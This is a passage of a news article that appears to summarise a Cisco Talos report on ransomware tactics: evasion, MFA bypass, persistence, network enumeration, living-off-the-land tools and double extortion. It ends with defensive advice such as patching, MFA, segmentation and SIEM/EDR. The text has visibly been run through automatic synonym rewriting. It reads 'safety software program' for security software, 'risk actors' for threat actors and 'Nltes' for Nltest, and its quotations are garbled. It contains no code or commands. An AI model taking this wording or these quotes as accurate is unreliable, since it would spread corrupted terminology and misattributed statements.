To keep away from detection, ransomware actors make use of “protection evasion strategies” corresponding to disabling or modifying safety software program, together with anti-virus packages and endpoint detection options. In addition they usually attempt to disable security measures within the working system to stop the detection of the ransomware payload,” Nutland wrote. “Adversaries may also usually obfuscate malicious software program by packing and compressing the code, finally unpacking itself in reminiscence when executed. They’ll additionally modify the system registry to disable safety alerts, configure the software program to execute at startup, or block sure restoration choices for customers.”
Talos famous a variety of further ransomware traits, together with:
- MFA exploits: “Adversaries might ship emails containing malicious attachments or URL hyperlinks that can execute malicious code on the goal system, deploying the actors’ instruments and malware, and exploiting multi-factor authentication (MFA). There are numerous methods adversaries hope to bypass MFA, whether or not due to poor implementation or as a result of they have already got legitimate account credentials. Most notably, we now have seen an growing variety of ransomware associates trying to use vulnerabilities or misconfigurations in internet-facing techniques, corresponding to in legacy or unpatched software program.”
- Looking for long-term entry: “…actors will look to ascertain long-term entry, guaranteeing that their operations will probably be profitable even when their preliminary intrusion is found and remediated. Attackers usually use automated malware persistence mechanisms, corresponding to AutoStart execution upon system boot, or modify registry entries. Distant entry software program instruments and create native, area and/or cloud accounts will also be deployed to ascertain secondary credentialed entry.”
- Enumerating goal environments: “Upon establishing persistent entry, risk actors will then try to enumerate the goal setting to know the community’s construction, find assets that may help the assault, and establish knowledge of worth that may be stolen in double extortion. Utilizing numerous native utilities and bonafide providers, they exploit weak entry controls and elevate privileges to the administrator stage to progress additional alongside the assault chain.”
- Utilizing community scanner utilities: “We’ve got noticed the favored use of many community scanner utilities along with native working system instruments and utilities (living-off-the-land binaries) like Certutil, Wevtutil, Internet, Nltes and Netsh to mix in with typical working system features, exploit trusted functions and processes, and assist in malware supply.”
- Double extortion: “Within the shifting focus to a double extortion mannequin, many adversaries acquire delicate or confidential info to ship to an exterior adversary-controlled useful resource or over some C2 mechanism. File compression and encryption utilities WinRAR and 7-Zip have been used to hide recordsdata for the unauthorized switch of knowledge, whereas adversaries usually exfiltrate recordsdata utilizing the beforehand talked about legit RMM instruments. Customized knowledge exfiltration instruments have been developed and utilized by the extra mature RaaS operations, providing customized tooling corresponding to Exbyte (BlackByte) and StealBit (LockBit) to facilitate knowledge theft.”
Earlier this yr Talos wrote that unhealthy actors who’re perpetrating superior persistent risk (APT) assaults aren’t simply seeking to entry your community. They need to sneak in and grasp round to gather useful knowledge or lay plans for future assaults. Submit-compromise threats are rising, and so they’re aimed largely at ageing community infrastructure and edge units which might be long gone end-of-life stage and will have important unpatched vulnerabilities.
A number of the issues companies can do to fight ransomware assaults embody often and persistently making use of patches and updates to all techniques and software program to handle vulnerabilities promptly and cut back the chance of exploitation, in accordance with Nutland. “Implement robust password insurance policies that require complicated, distinctive passwords for every account. Moreover, implement multi-factor authentication (MFA) so as to add an additional layer of safety,” Nutland acknowledged.
Segmenting the community to isolate delicate knowledge and techniques, stopping lateral motion in case of a breach. Along with using community entry management mechanisms corresponding to 802.1X to authenticate units earlier than granting community entry, guaranteeing solely approved system connections, Nutland wrote.
“Implement a Safety Info and Occasion Administration (SIEM) system to repeatedly monitor and analyze safety occasions, along with the deployment of EDR/XDR options on all shoppers and servers to offer superior risk detection, investigation, and response capabilities,” Nutland wrote.
